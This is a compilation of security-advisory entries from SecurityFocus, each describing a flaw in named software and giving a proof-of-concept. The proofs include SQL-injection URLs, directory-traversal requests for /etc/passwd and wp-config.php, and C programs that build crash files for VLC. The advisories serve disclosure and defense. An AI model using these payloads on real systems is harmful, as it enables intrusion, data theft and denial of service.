source: http://www.securityfocus.com/bid/64572/info

CMS Afroditi is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

CMS Afroditi 1.0 is vulnerable.

http://www.example.com/default.asp?id=25 and 0<=(SELECT count(*) FROM [site]) and 1=1

source: http://www.securityfocus.com/bid/64617/info

Apache Libcloud is prone to a local information-disclosure vulnerability.

Local attackers can exploit this issue to obtain sensitive information. Information obtained may lead to further attacks.

Apache Libcloud versions 0.12.3 through 0.13.2 are vulnerable.

dd if=/dev/vda bs=1M | strings -n 100 > out.txt

source: http://www.securityfocus.com/bid/64623/info

VLC Media Player is prone to a denial-of-service vulnerability.

Successful exploits may allow attackers to crash the affected application, denying service to legitimate users.

VLC Media Player 1.1.11 is vulnerable; other versions may also be affected.

# Exploit Title: VLC v. 1.1.11 .nsv DOS

# Date: 3/14/2012

# Author: Dan Fosco

# Vendor or Software Link: www.videolan.org

# Version: 1.1.11

# Category: local

# Google dork: n/a

# Tested on: Windows XP SP3 (64-bit)

# Demo site: n/a

#include <stdio.h>

int main()

{

FILE *f;

f = fopen("dos.nsv", "w");

fputs("\x4e\x53\x56\x66", f);

fputc('\x00', f);

fputc('\x00', f);

fputc('\x00', f);

fputc('\x00', f);

fclose(f);

return 0;

}

edit: works on 2.0.1.0

source: http://www.securityfocus.com/bid/64626/info

VLC Media Player is prone to a denial-of-service vulnerability.

Successful exploits may allow attackers to crash the affected application, denying service to legitimate users.

VLC Media Player 1.1.11 is vulnerable; other versions may also be affected.

# Exploit Title: VLC v. 1.1.11 .eac3 DOS

# Date: 3/14/2012

# Author: Dan Fosco

# Vendor or Software Link: www.videolan.org

# Version: 1.1.11

# Category:: local

# Google dork: n/a

# Tested on: Windows XP SP3 (64-bit)

# Demo site: n/a

#include <stdio.h>

int main(int argc, char *argv[])

{

FILE *f;

f = fopen(argv[1], "r+");

fseek(f, 5, SEEK_SET);

fputc('\x00', f);

fclose(f);

return 0;

}

source: http://www.securityfocus.com/bid/64587/info

The Advanced Dewplayer plugin for WordPress is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.

Exploiting this issue can allow an attacker to obtain sensitive information that could aid in further attacks.

Advanced Dewplayer 1.2 is vulnerable; other versions may also be affected.

http://www.example.com/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php

source: http://www.securityfocus.com/bid/64619/info

xBoard is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts. This could allow the attacker to compromise the application and the computer; other attacks are also possible.

xBoard 5.0, 5.5, and 6.0 are vulnerable.

http://www.example.com/xboard/view.php?post=[LFI]

source: http://www.securityfocus.com/bid/64693/info

SPAMINA Cloud Email Firewall is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input.

A remote attacker could exploit the vulnerability using directory-traversal characters ('../') to access arbitrary files that contain sensitive information. Information harvested may aid in launching further attacks.

SPAMINA Cloud Email Firewall 3.3.1.1 is vulnerable; other versions may also be affected.

https://www.example.com/?action=showHome&language=../../../../../../../../../../etc/passwd%00.jpg

https://www.example.com/multiadmin/js/lib/?action=../../../../../../../../../../etc/passwd&language=de

https://www.example.com/index.php?action=userLogin&language=../../../../../../../../../../etc/passwd.jpg

source: http://www.securityfocus.com/bid/64705/info

The Aclsfgpl component for Joomla! is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.

An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.

http://www.example.com/index.php?option=com_aclsfgpl&Itemid=[num]&ct=servs1&md=add_form

source: http://www.securityfocus.com/bid/64707/info

Command School Student Management System is prone to the following security vulnerabilities:

1. Multiple SQL-injection vulnerabilities

2. A cross-site request forgery vulnerability

3. A cross-site scripting vulnerability

4. An HTML injection vulnerability

5. A security-bypass vulnerability

Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions.

Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected.

http://www.example.com/sw/admin_grades.php?action=edit&id=null+and+1=2+union+select+version()